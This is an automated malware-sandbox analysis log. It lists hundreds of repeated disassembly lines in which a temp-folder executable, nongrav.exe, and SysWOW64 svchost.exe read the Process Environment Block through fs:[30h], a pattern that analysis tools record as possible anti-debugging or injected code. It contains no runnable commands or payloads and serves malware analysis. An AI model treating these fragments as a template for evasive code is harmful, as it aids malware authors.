Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h] 15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF35A1 mov eax, dword ptr fs:[00000030h] 15_2_1EAF35A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB469A6 mov eax, dword ptr fs:[00000030h] 15_2_1EB469A6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h] 15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h] 15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h] 15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h] 15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA185 mov eax, dword ptr fs:[00000030h] 15_2_1EAFA185
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC182 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC182
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h] 15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h] 15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2990 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2990
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB78DF1 mov eax, dword ptr fs:[00000030h] 15_2_1EB78DF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h] 15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h] 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h] 15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h] 15_2_1EB8FDE2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB541E8 mov eax, dword ptr fs:[00000030h] 15_2_1EB541E8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov ecx, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h] 15_2_1EB46DC9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8E539 mov eax, dword ptr fs:[00000030h] 15_2_1EB8E539
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB4A537 mov eax, dword ptr fs:[00000030h] 15_2_1EB4A537
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98D34 mov eax, dword ptr fs:[00000030h] 15_2_1EB98D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE4120 mov ecx, dword ptr fs:[00000030h] 15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h] 15_2_1EAF4D3B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h] 15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h] 15_2_1EAF513A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h] 15_2_1EAD3D34
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAD30 mov eax, dword ptr fs:[00000030h] 15_2_1EACAD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9100
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC962 mov eax, dword ptr fs:[00000030h] 15_2_1EACC962
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h] 15_2_1EAEC577
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h] 15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h] 15_2_1EACB171
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h] 15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h] 15_2_1EAEB944
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB03D43 mov eax, dword ptr fs:[00000030h] 15_2_1EB03D43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43540 mov eax, dword ptr fs:[00000030h] 15_2_1EB43540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE7D50 mov eax, dword ptr fs:[00000030h] 15_2_1EAE7D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF5BA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF5BA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE138A mov eax, dword ptr fs:[00000030h] 22_2_03AE138A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h] 22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h] 22_2_03A31B8F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADD380 mov ecx, dword ptr fs:[00000030h] 22_2_03ADD380
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5B390 mov eax, dword ptr fs:[00000030h] 22_2_03A5B390
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h] 22_2_03AA7794
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h] 22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A24F2E mov eax, dword ptr fs:[00000030h] 22_2_03A24F2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5E730 mov eax, dword ptr fs:[00000030h] 22_2_03A5E730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h] 22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF070D mov eax, dword ptr fs:[00000030h] 22_2_03AF070D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AE131B mov eax, dword ptr fs:[00000030h] 22_2_03AE131B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h] 22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFF10 mov eax, dword ptr fs:[00000030h] 22_2_03ABFF10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2DB60 mov ecx, dword ptr fs:[00000030h] 22_2_03A2DB60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3FF60 mov eax, dword ptr fs:[00000030h] 22_2_03A3FF60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8F6A mov eax, dword ptr fs:[00000030h] 22_2_03AF8F6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h] 22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A53B7A mov eax, dword ptr fs:[00000030h] 22_2_03A53B7A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2DB40 mov eax, dword ptr fs:[00000030h] 22_2_03A2DB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3EF40 mov eax, dword ptr fs:[00000030h] 22_2_03A3EF40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8B58 mov eax, dword ptr fs:[00000030h] 22_2_03AF8B58
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2F358 mov eax, dword ptr fs:[00000030h] 22_2_03A2F358
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A252A5 mov eax, dword ptr fs:[00000030h] 22_2_03A252A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF0EA5 mov eax, dword ptr fs:[00000030h] 22_2_03AF0EA5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AA46A7 mov eax, dword ptr fs:[00000030h] 22_2_03AA46A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FAB0 mov eax, dword ptr fs:[00000030h] 22_2_03A5FAB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ABFE87 mov eax, dword ptr fs:[00000030h] 22_2_03ABFE87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h] 22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5D294 mov eax, dword ptr fs:[00000030h] 22_2_03A5D294
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A376E2 mov eax, dword ptr fs:[00000030h] 22_2_03A376E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A516E0 mov ecx, dword ptr fs:[00000030h] 22_2_03A516E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A68EC7 mov eax, dword ptr fs:[00000030h] 22_2_03A68EC7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A536CC mov eax, dword ptr fs:[00000030h] 22_2_03A536CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADFEC0 mov eax, dword ptr fs:[00000030h] 22_2_03ADFEC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8ED6 mov eax, dword ptr fs:[00000030h] 22_2_03AF8ED6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2E620 mov eax, dword ptr fs:[00000030h] 22_2_03A2E620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADFE3F mov eax, dword ptr fs:[00000030h] 22_2_03ADFE3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2C600 mov eax, dword ptr fs:[00000030h] 22_2_03A2C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A43A1C mov eax, dword ptr fs:[00000030h] 22_2_03A43A1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h] 22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03ADB260 mov eax, dword ptr fs:[00000030h] 22_2_03ADB260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8A62 mov eax, dword ptr fs:[00000030h] 22_2_03AF8A62
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A3766D mov eax, dword ptr fs:[00000030h] 22_2_03A3766D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4AE73 mov eax, dword ptr fs:[00000030h] 22_2_03A4AE73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6927A mov eax, dword ptr fs:[00000030h] 22_2_03A6927A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29240 mov eax, dword ptr fs:[00000030h] 22_2_03A29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A37E41 mov eax, dword ptr fs:[00000030h] 22_2_03A37E41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A535A1 mov eax, dword ptr fs:[00000030h] 22_2_03A535A1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5A185 mov eax, dword ptr fs:[00000030h] 22_2_03A5A185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A4C182 mov eax, dword ptr fs:[00000030h] 22_2_03A4C182
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A22D8A mov eax, dword ptr fs:[00000030h] 22_2_03A22D8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h] 22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5FD9B mov eax, dword ptr fs:[00000030h] 22_2_03A5FD9B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2B1E1 mov eax, dword ptr fs:[00000030h] 22_2_03A2B1E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AD8DF1 mov eax, dword ptr fs:[00000030h] 22_2_03AD8DF1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov eax, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A44120 mov ecx, dword ptr fs:[00000030h] 22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A2AD30 mov eax, dword ptr fs:[00000030h] 22_2_03A2AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A33D34 mov eax, dword ptr fs:[00000030h] 22_2_03A33D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AF8D34 mov eax, dword ptr fs:[00000030h] 22_2_03AF8D34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03AAA537 mov eax, dword ptr fs:[00000030h] 22_2_03AAA537
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A54D3B mov eax, dword ptr fs:[00000030h] 22_2_03A54D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h] 22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A5513A mov eax, dword ptr fs:[00000030h] 22_2_03A5513A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A29100 mov eax, dword ptr fs:[00000030h] 22_2_03A29100
